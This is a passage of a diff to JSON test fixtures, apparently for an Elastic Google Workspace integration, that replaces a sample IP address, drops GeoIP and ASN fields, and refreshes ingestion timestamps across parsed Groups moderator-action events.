- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_identity_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"identity_setting\",\"value\":\"required_forms_of_identity\"},{\"name\":\"new_value\",\"value\":\"display_name_only\"},{\"name\":\"old_value\",\"value\":\"display_name_or_google_profile\"}]}}",
+ "ingested": "2021-12-09T13:39:12.286067700Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_identity_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"identity_setting\",\"value\":\"required_forms_of_identity\"},{\"name\":\"new_value\",\"value\":\"display_name_only\"},{\"name\":\"old_value\",\"value\":\"display_name_or_google_profile\"}]}}",
 "provider": "groups",
 "action": "change_identity_setting",
 "id": "1",
@@ -848,31 +686,13 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -886,7 +706,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -910,8 +730,8 @@
 "id": "1"
 },
 "event": {
- "ingested": "2021-06-09T10:57:29.728253900Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"add_info_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"info_setting\",\"value\":\"custom_footer\"},{\"name\":\"value\",\"value\":\"footer\"}]}}",
+ "ingested": "2021-12-09T13:39:12.286072900Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"add_info_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"info_setting\",\"value\":\"custom_footer\"},{\"name\":\"value\",\"value\":\"footer\"}]}}",
 "provider": "groups",
 "action": "add_info_setting",
 "id": "1",
@@ -942,31 +762,13 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -980,7 +782,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -1005,8 +807,8 @@
 "id": "1"
 },
 "event": {
- "ingested": "2021-06-09T10:57:29.728255400Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_info_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"info_setting\",\"value\":\"custom_footer\"},{\"name\":\"new_value\",\"value\":\"footer\"},{\"name\":\"old_value\",\"value\":\"old footer\"}]}}",
+ "ingested": "2021-12-09T13:39:12.286078200Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_info_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"info_setting\",\"value\":\"custom_footer\"},{\"name\":\"new_value\",\"value\":\"footer\"},{\"name\":\"old_value\",\"value\":\"old footer\"}]}}",
 "provider": "groups",
 "action": "change_info_setting",
 "id": "1",
@@ -1037,31 +839,13 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -1075,7 +859,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -1099,8 +883,8 @@
 "id": "1"
 },
 "event": {
- "ingested": "2021-06-09T10:57:29.728257Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"remove_info_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"info_setting\",\"value\":\"custom_footer\"},{\"name\":\"value\",\"value\":\"footer\"}]}}",
+ "ingested": "2021-12-09T13:39:12.286083700Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"remove_info_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"info_setting\",\"value\":\"custom_footer\"},{\"name\":\"value\",\"value\":\"footer\"}]}}",
 "provider": "groups",
 "action": "remove_info_setting",
 "id": "1",
@@ -1131,31 +915,13 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -1169,7 +935,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -1194,8 +960,8 @@
 "id": "1"
 },
 "event": {
- "ingested": "2021-06-09T10:57:29.728258500Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_new_members_restrictions_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"new_members_restrictions_setting\",\"value\":\"new_members_can_post\"},{\"name\":\"new_value\",\"value\":\"inherit\"},{\"name\":\"old_value\",\"value\":\"overriden_to_false\"}]}}",
+ "ingested": "2021-12-09T13:39:12.286088900Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_new_members_restrictions_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"new_members_restrictions_setting\",\"value\":\"new_members_can_post\"},{\"name\":\"new_value\",\"value\":\"inherit\"},{\"name\":\"old_value\",\"value\":\"overriden_to_false\"}]}}",
 "provider": "groups",
 "action": "change_new_members_restrictions_setting",
 "id": "1",
@@ -1226,31 +992,13 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -1264,7 +1012,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -1289,8 +1037,8 @@
 "id": "1"
 },
 "event": {
- "ingested": "2021-06-09T10:57:29.728259900Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_post_replies_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"post_replies_setting\",\"value\":\"where_should_replies_be_sent\"},{\"name\":\"new_value\",\"value\":\"reply_to_custom_address\"},{\"name\":\"old_value\",\"value\":\"reply_to_author_only\"}]}}",
+ "ingested": "2021-12-09T13:39:12.286094100Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_post_replies_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"post_replies_setting\",\"value\":\"where_should_replies_be_sent\"},{\"name\":\"new_value\",\"value\":\"reply_to_custom_address\"},{\"name\":\"old_value\",\"value\":\"reply_to_author_only\"}]}}",
 "provider": "groups",
 "action": "change_post_replies_setting",
 "id": "1",
@@ -1321,31 +1069,13 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -1359,7 +1089,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -1384,8 +1114,8 @@
 "id": "1"
 },
 "event": {
- "ingested": "2021-06-09T10:57:29.728261400Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_spam_moderation_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"spam_moderation_setting\",\"value\":\"how_to_handle_suspected_spam_messages\"},{\"name\":\"new_value\",\"value\":\"moderate_and_do_not_send_notifications\"},{\"name\":\"old_value\",\"value\":\"moderate_and_send_notifications\"}]}}",
+ "ingested": "2021-12-09T13:39:12.286099400Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_spam_moderation_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"spam_moderation_setting\",\"value\":\"how_to_handle_suspected_spam_messages\"},{\"name\":\"new_value\",\"value\":\"moderate_and_do_not_send_notifications\"},{\"name\":\"old_value\",\"value\":\"moderate_and_send_notifications\"}]}}",
 "provider": "groups",
 "action": "change_spam_moderation_setting",
 "id": "1",
@@ -1416,31 +1146,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1454,7 +1166,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -1479,8 +1191,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:29.728263Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_topic_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"topic_setting\",\"value\":\"allowed_topic_types\"},{\"name\":\"new_value\",\"value\":\"discussions_questions\"},{\"name\":\"old_value\",\"value\":\"discussions\"}]}}", + "ingested": "2021-12-09T13:39:12.286104600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_topic_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"topic_setting\",\"value\":\"allowed_topic_types\"},{\"name\":\"new_value\",\"value\":\"discussions_questions\"},{\"name\":\"old_value\",\"value\":\"discussions\"}]}}", "provider": "groups", "action": "change_topic_setting", "id": "1", 
@@ -1511,31 +1223,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1549,7 +1243,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -1576,8 +1270,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:29.728264600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"moderate_message\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"message_moderation_action\",\"value\":\"approved\"},{\"name\":\"status\",\"value\":\"succeeded\"},{\"name\":\"message_id\",\"value\":\"message id\"}]}}", + "ingested": "2021-12-09T13:39:12.286109900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"moderate_message\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"message_moderation_action\",\"value\":\"approved\"},{\"name\":\"status\",\"value\":\"succeeded\"},{\"name\":\"message_id\",\"value\":\"message id\"}]}}", "provider": "groups", "action": "moderate_message", "id": "1", 
@@ -1607,31 +1301,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1646,7 +1322,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -1672,8 +1348,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:29.728266100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"always_post_from_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"},{\"name\":\"status\",\"value\":\"succeeded\"}]}}", + "ingested": "2021-12-09T13:39:12.286115200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"always_post_from_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"},{\"name\":\"status\",\"value\":\"succeeded\"}]}}", "provider": "groups", "action": "always_post_from_user", "id": "1", @@ -1706,31 +1382,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" 
@@ -1745,7 +1403,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1771,8 +1429,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:29.728267600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"add_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"},{\"name\":\"member_role\",\"value\":\"manager\"}]}}", + "ingested": "2021-12-09T13:39:12.286120500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"add_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"},{\"name\":\"member_role\",\"value\":\"manager\"}]}}", "provider": "groups", "action": "add_user", "id": "1", @@ -1806,31 +1464,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" 
@@ -1845,7 +1485,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1871,8 +1511,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:29.728269100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"ban_user_with_moderation\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"},{\"name\":\"member_role\",\"value\":\"manager\"}]}}", + "ingested": "2021-12-09T13:39:12.286125700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"ban_user_with_moderation\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"},{\"name\":\"member_role\",\"value\":\"manager\"}]}}", "provider": "groups", "action": "ban_user_with_moderation", "id": "1", 
@@ -1906,31 +1546,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1945,7 +1567,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1970,8 +1592,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:29.728270500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"revoke_invitation\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:39:12.286130900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"revoke_invitation\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}", "provider": "groups", "action": "revoke_invitation", "id": "1", 
@@ -2005,31 +1627,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2044,7 +1648,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2069,8 +1673,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:29.728272Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"invite_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:39:12.286136200Z", + "original": 